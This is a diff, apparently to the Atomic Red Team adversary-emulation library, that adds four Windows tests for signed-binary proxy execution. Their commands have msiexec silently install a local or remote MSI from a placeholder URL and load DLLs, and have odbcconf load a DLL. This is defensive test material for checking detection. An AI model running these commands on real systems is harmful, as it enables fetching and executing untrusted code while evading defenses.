diff --git a/atomics/T1218/T1218.md b/atomics/T1218/T1218.md
index 6c51bc99..ea0f4256 100644
--- a/atomics/T1218/T1218.md
+++ b/atomics/T1218/T1218.md
@@ -33,6 +33,14 @@ Several other binaries exist that may be used to perform similar behavior. (Cita
- [Atomic Test #3 - Register-CimProvider - Execute evil dll](#atomic-test-3---register-cimprovider---execute-evil-dll)
+- [Atomic Test #4 - Msiexec.exe - Execute Local MSI file](#atomic-test-4---msiexecexe---execute-local-msi-file)
+
+- [Atomic Test #5 - Msiexec.exe - Execute Remote MSI file](#atomic-test-5---msiexecexe---execute-remote-msi-file)
+
+- [Atomic Test #6 - Msiexec.exe - Execute Arbitrary DLL](#atomic-test-6---msiexecexe---execute-arbitrary-dll)
+
+- [Atomic Test #7 - Odbcconf.exe - Execute Arbitrary DLL](#atomic-test-7---odbcconfexe---execute-arbitrary-dll)
+
@@ -97,4 +105,88 @@ C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload}
+
+
+
+## Atomic Test #4 - Msiexec.exe - Execute Local MSI file
+Execute arbitrary MSI file. Commonly seen in application installation.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| msi_payload | MSI file to execute | Path | PathToAtomicsFolder\T1218\src\Win32\T1218.msi|
+
+#### Run it with `command_prompt`!
+```
+msiexec.exe /q /i "#{msi_payload}"
+```
+
+
+
+
+
+
+## Atomic Test #5 - Msiexec.exe - Execute Remote MSI file
+Execute arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| msi_payload | MSI file to execute | String | http://site.com/file.msi|
+
+#### Run it with `command_prompt`!
+```
+msiexec.exe /q /i "#{msi_payload}"
+```
+
+
+
+
+
+
+## Atomic Test #6 - Msiexec.exe - Execute Arbitrary DLL
+Execute arbitrary DLL file stored locally. Commonly seen in application installation.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| dll_payload | DLL to execute | Path | PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll|
+
+#### Run it with `command_prompt`!
+```
+msiexec.exe /y "#{dll_payload}"
+```
+
+
+
+
+
+
+## Atomic Test #7 - Odbcconf.exe - Execute Arbitrary DLL
+Execute arbitrary DLL file stored locally.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| dll_payload | DLL to execute | Path | PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll|
+
+#### Run it with `command_prompt`!
+```
+odbcconf.exe /S /A {REGSVR "#{dll_payload}"}
+```
+
+
+
diff --git a/atomics/T1218/T1218.yaml b/atomics/T1218/T1218.yaml
index 3909a4dc..0be10657 100644
--- a/atomics/T1218/T1218.yaml
+++ b/atomics/T1218/T1218.yaml
@@ -58,3 +58,72 @@ atomic_tests:
name: command_prompt
command: |
C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload}
+
+- name: Msiexec.exe - Execute Local MSI file
+ description: |
+ Execute arbitrary MSI file. Commonly seen in application installation.
+
+ supported_platforms:
+ - windows
+
+ input_arguments:
+ msi_payload:
+ description: MSI file to execute
+ type: Path
+ default: PathToAtomicsFolder\T1218\src\Win32\T1218.msi
+ executor:
+ name: command_prompt
+ command: |
+ msiexec.exe /q /i "#{msi_payload}"
+
+- name: Msiexec.exe - Execute Remote MSI file
+ description: |
+ Execute arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution.
+
+ supported_platforms:
+ - windows
+
+ input_arguments:
+ msi_payload:
+ description: MSI file to execute
+ type: String
+ default: http://site.com/file.msi
+ executor:
+ name: command_prompt
+ command: |
+ msiexec.exe /q /i "#{msi_payload}"
+
+- name: Msiexec.exe - Execute Arbitrary DLL
+ description: |
+ Execute arbitrary DLL file stored locally. Commonly seen in application installation.
+
+ supported_platforms:
+ - windows
+
+ input_arguments:
+ dll_payload:
+ description: DLL to execute
+ type: Path
+ default: PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll
+ executor:
+ name: command_prompt
+ command: |
+ msiexec.exe /y "#{dll_payload}"
+
+- name: Odbcconf.exe - Execute Arbitrary DLL
+ description: |
+ Execute arbitrary DLL file stored locally.
+
+ supported_platforms:
+ - windows
+
+ input_arguments:
+ dll_payload:
+ description: DLL to execute
+ type: Path
+ default: PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll
+ executor:
+ name: command_prompt
+ command: |
+ odbcconf.exe /S /A {REGSVR "#{dll_payload}"}
+
diff --git a/atomics/index.md b/atomics/index.md
index 5eb5240d..2be43da7 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -342,6 +342,10 @@
- Atomic Test #1: mavinject - Inject DLL into running process [windows]
- Atomic Test #2: SyncAppvPublishingServer - Execute arbitrary PowerShell code [windows]
- Atomic Test #3: Register-CimProvider - Execute evil dll [windows]
+ - Atomic Test #4: Msiexec.exe - Execute Local MSI file [windows]
+ - Atomic Test #5: Msiexec.exe - Execute Remote MSI file [windows]
+ - Atomic Test #6: Msiexec.exe - Execute Arbitrary DLL [windows]
+ - Atomic Test #7: Odbcconf.exe - Execute Arbitrary DLL [windows]
- [T1216 Signed Script Proxy Execution](./T1216/T1216.md)
- Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
- T1045 Software Packing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -710,6 +714,10 @@
- Atomic Test #1: mavinject - Inject DLL into running process [windows]
- Atomic Test #2: SyncAppvPublishingServer - Execute arbitrary PowerShell code [windows]
- Atomic Test #3: Register-CimProvider - Execute evil dll [windows]
+ - Atomic Test #4: Msiexec.exe - Execute Local MSI file [windows]
+ - Atomic Test #5: Msiexec.exe - Execute Remote MSI file [windows]
+ - Atomic Test #6: Msiexec.exe - Execute Arbitrary DLL [windows]
+ - Atomic Test #7: Odbcconf.exe - Execute Arbitrary DLL [windows]
- [T1216 Signed Script Proxy Execution](./T1216/T1216.md)
- Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
- [T1153 Source](./T1153/T1153.md)
diff --git a/atomics/index.yaml b/atomics/index.yaml
index 8144122a..b6246769 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -10237,6 +10237,66 @@ defense-evasion:
name: command_prompt
command: "C:\\Windows\\SysWow64\\Register-CimProvider.exe -Path #{dll_payload}
\n"
+ - name: Msiexec.exe - Execute Local MSI file
+ description: 'Execute arbitrary MSI file. Commonly seen in application installation.
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ msi_payload:
+ description: MSI file to execute
+ type: Path
+ default: PathToAtomicsFolder\T1218\src\Win32\T1218.msi
+ executor:
+ name: command_prompt
+ command: "msiexec.exe /q /i \"#{msi_payload}\" \n"
+ - name: Msiexec.exe - Execute Remote MSI file
+ description: 'Execute arbitrary MSI file retrieved remotely. Less commonly seen
+ in application installation, commonly seen in malware execution.
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ msi_payload:
+ description: MSI file to execute
+ type: String
+ default: http://site.com/file.msi
+ executor:
+ name: command_prompt
+ command: "msiexec.exe /q /i \"#{msi_payload}\" \n"
+ - name: Msiexec.exe - Execute Arbitrary DLL
+ description: 'Execute arbitrary DLL file stored locally. Commonly seen in application
+ installation.
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ dll_payload:
+ description: DLL to execute
+ type: Path
+ default: PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll
+ executor:
+ name: command_prompt
+ command: "msiexec.exe /y \"#{dll_payload}\" \n"
+ - name: Odbcconf.exe - Execute Arbitrary DLL
+ description: 'Execute arbitrary DLL file stored locally.
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ dll_payload:
+ description: DLL to execute
+ type: Path
+ default: PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll
+ executor:
+ name: command_prompt
+ command: 'odbcconf.exe /S /A {REGSVR "#{dll_payload}"}
+
+'
T1216:
technique:
x_mitre_data_sources:
@@ -20397,6 +20457,66 @@ execution:
name: command_prompt
command: "C:\\Windows\\SysWow64\\Register-CimProvider.exe -Path #{dll_payload}
\n"
+ - name: Msiexec.exe - Execute Local MSI file
+ description: 'Execute arbitrary MSI file. Commonly seen in application installation.
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ msi_payload:
+ description: MSI file to execute
+ type: Path
+ default: PathToAtomicsFolder\T1218\src\Win32\T1218.msi
+ executor:
+ name: command_prompt
+ command: "msiexec.exe /q /i \"#{msi_payload}\" \n"
+ - name: Msiexec.exe - Execute Remote MSI file
+ description: 'Execute arbitrary MSI file retrieved remotely. Less commonly seen
+ in application installation, commonly seen in malware execution.
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ msi_payload:
+ description: MSI file to execute
+ type: String
+ default: http://site.com/file.msi
+ executor:
+ name: command_prompt
+ command: "msiexec.exe /q /i \"#{msi_payload}\" \n"
+ - name: Msiexec.exe - Execute Arbitrary DLL
+ description: 'Execute arbitrary DLL file stored locally. Commonly seen in application
+ installation.
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ dll_payload:
+ description: DLL to execute
+ type: Path
+ default: PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll
+ executor:
+ name: command_prompt
+ command: "msiexec.exe /y \"#{dll_payload}\" \n"
+ - name: Odbcconf.exe - Execute Arbitrary DLL
+ description: 'Execute arbitrary DLL file stored locally.
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ dll_payload:
+ description: DLL to execute
+ type: Path
+ default: PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll
+ executor:
+ name: command_prompt
+ command: 'odbcconf.exe /S /A {REGSVR "#{dll_payload}"}
+
+'
T1216:
technique:
x_mitre_data_sources:
diff --git a/atomics/windows-index.md b/atomics/windows-index.md
index a956d34f..181ee513 100644
--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -132,6 +132,10 @@
- Atomic Test #1: mavinject - Inject DLL into running process [windows]
- Atomic Test #2: SyncAppvPublishingServer - Execute arbitrary PowerShell code [windows]
- Atomic Test #3: Register-CimProvider - Execute evil dll [windows]
+ - Atomic Test #4: Msiexec.exe - Execute Local MSI file [windows]
+ - Atomic Test #5: Msiexec.exe - Execute Remote MSI file [windows]
+ - Atomic Test #6: Msiexec.exe - Execute Arbitrary DLL [windows]
+ - Atomic Test #7: Odbcconf.exe - Execute Arbitrary DLL [windows]
- [T1216 Signed Script Proxy Execution](./T1216/T1216.md)
- Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
- T1045 Software Packing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -572,6 +576,10 @@
- Atomic Test #1: mavinject - Inject DLL into running process [windows]
- Atomic Test #2: SyncAppvPublishingServer - Execute arbitrary PowerShell code [windows]
- Atomic Test #3: Register-CimProvider - Execute evil dll [windows]
+ - Atomic Test #4: Msiexec.exe - Execute Local MSI file [windows]
+ - Atomic Test #5: Msiexec.exe - Execute Remote MSI file [windows]
+ - Atomic Test #6: Msiexec.exe - Execute Arbitrary DLL [windows]
+ - Atomic Test #7: Odbcconf.exe - Execute Arbitrary DLL [windows]
- [T1216 Signed Script Proxy Execution](./T1216/T1216.md)
- Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
- T1072 Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)